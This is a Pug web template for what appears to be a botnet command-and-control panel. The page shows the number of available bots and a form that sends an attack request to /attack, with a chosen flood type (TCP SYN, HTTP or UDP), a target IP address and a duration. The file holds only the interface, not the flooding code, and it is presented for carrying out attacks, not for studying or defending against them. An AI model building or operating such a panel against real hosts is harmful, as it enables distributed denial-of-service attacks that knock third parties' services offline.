extends layout

block content
    h3(class="text-center text-info") Available bots: #{botsNumber}
    div(class="d-flex flex-row justify-content-center align-items-center" style="height: 50vh;")
        div(class="card mx-auto" style="width: 50vw;")
            div(class="card-body")
                form(method="post" action="/attack" id="startAttackForm")
                    div(class="ht-tm-codeblock")
                        select(class="ht-tm-element custom-select custom-select-lg" name="attackType" id="attackSelect")
                            option(selected) Choose attack type
                            option(value="syn") TCP Syn flood
                            option(value="http") HTTP flood
                            option(value="udp") UDP flood
                    br
                    div(class="ht-tm-codeblock")
                        div(class="ht-tm-element input-group")
                            input(type="text" class="form-control form-control-lg" placeholder="Target IP address" id="targetIP" name="targetIP")
                            input(type="text" class="form-control form-control-lg" placeholder="Attack duration" id="attackDuration" name="attackDuration")
                            div(class="input-group-append")
                                button(class="btn btn-lg btn-primary" type="submit" id="attackBtn" disabled) Attack!
    script(src="javascripts/clientMain.js")